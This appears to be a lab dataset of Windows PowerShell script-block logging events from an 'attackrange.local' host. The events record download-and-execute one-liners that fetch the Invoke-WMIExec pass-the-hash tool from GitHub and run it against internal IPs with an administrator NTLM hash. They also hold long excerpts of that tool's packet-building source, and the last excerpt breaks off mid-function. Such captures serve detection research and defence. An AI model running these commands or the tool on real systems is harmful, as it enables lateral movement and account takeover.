4104152150x0723293Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.15 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}7666075d-ab7e-462f-8044-32566fd656f1 4104132150x0722793Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local17function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) return $packet_RPCAlterContext } function New-PacketNTLMSSPVerifier { param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary if($packet_auth_padding -eq 4) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x04 } elseif($packet_auth_padding -eq 8) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x08 } elseif($packet_auth_padding -eq 12) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x0c } else { [Byte[]]$packet_auth_pad_length = 0x00 } $packet_NTLMSSPVerifier.Add("AuthType",[Byte[]](0x0a)) $packet_NTLMSSPVerifier.Add("AuthLevel",$packet_auth_level) $packet_NTLMSSPVerifier.Add("AuthPadLen",$packet_auth_pad_length) $packet_NTLMSSPVerifier.Add("AuthReserved",[Byte[]](0x00)) $packet_NTLMSSPVerifier.Add("AuthContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierVersionNumber",[Byte[]](0x01,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierChecksum",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierSequenceNumber",$packet_sequence_number) return $packet_NTLMSSPVerifier } function New-PacketDCOMRemQueryInterface { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IID) $packet_DCOMRemQueryInterface = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemQueryInterface.Add("VersionMajor",[Byte[]](0x05,0x00)) $packet_DCOb76c82eb-2c74-4b2a-96f3-3361ca7bca31 4104152150x0722787Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.17 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}ffc48f98-ee78-498b-8a88-f093151a9996 4104152150x0722785Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.17 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}99390849-3afd-4418-8efa-8390b12f97c1 4104152150x0722311Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 127.0.0.1 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c79eac0706-1644-4547-90bd-bce53e1794ad 4104152150x0722037Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.14 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7a35251a1-322e-4ad1-883a-1f2ad066278b 4104152150x0721773Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.17 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7a2ee195c-eba0-4a8b-99e4-cbbcd0340781 4104152150x0721502Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.17 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7491dd8cd-70d3-4c3a-8703-c427563995fd 4104152150x0721242Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.16 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c76a526770-e2a1-4899-b0af-611b41c3d4ad 4104152150x0720978Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c759f3bb28-d8d8-48b8-ac43-775686bd23b4 4104152150x0720701Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.14 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7b496dca1-3352-4a35-9e23-a71006ccadbf 4104132150x0720683Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local16function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) 